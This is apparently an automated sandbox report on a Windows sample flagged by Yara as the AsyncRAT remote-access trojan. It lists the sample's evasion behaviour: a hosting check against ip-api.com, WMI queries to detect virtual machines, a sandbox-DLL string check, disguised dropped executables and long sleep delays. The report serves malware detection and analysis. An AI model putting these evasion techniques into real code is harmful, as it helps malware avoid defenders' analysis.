                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AsyncRAT
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
                      Check if machine is in data center or colocation facility
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeMemory allocated: 1A600000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeMemory allocated: 26232600000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeMemory allocated: 2624C050000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\System User.exeMemory allocated: 1190000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exeMemory allocated: 1AE60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exeMemory allocated: F70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exeMemory allocated: 1AD60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exeMemory allocated: 1600000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exeMemory allocated: 1B100000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exeMemory allocated: 2BA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exeMemory allocated: 1AE00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599804Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599683Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599468Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599354Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599125Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 599015Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598742Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598632Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598515Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598295Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597949Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597176Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596916Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596764Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596647Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596510Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596400Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596168Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595952Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595843Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595619Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595511Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595390Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595171Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594951Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594799Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594323Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594075Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593859Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593749Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593640Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593418Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593306Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593059Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWindow / User API: threadDelayed 754Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWindow / User API: threadDelayed 9065Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeWindow / User API: threadDelayed 5209Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeWindow / User API: threadDelayed 4607Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7148Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2450Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6917
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2630
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6105
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3623
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7242
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2491
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_socket.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\libcrypto-3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\select.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\python313.dllJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_decimal.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17567
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeAPI coverage: 3.2 %
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe TID: 7880Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599804s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599683s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599468s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599354s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599015s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598742s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598632s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598515s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598295s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598078s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597949s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597176s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596916s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596764s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596647s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596510s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596400s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596168s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595952s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595843s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595619s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595511s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595390s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595171s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594951s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594799s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594323s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594075s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593969s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593859s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593749s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593640s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593418s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593306s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593059s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 6917 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 2630 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 6105 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -3689348814741908s >= -30000s
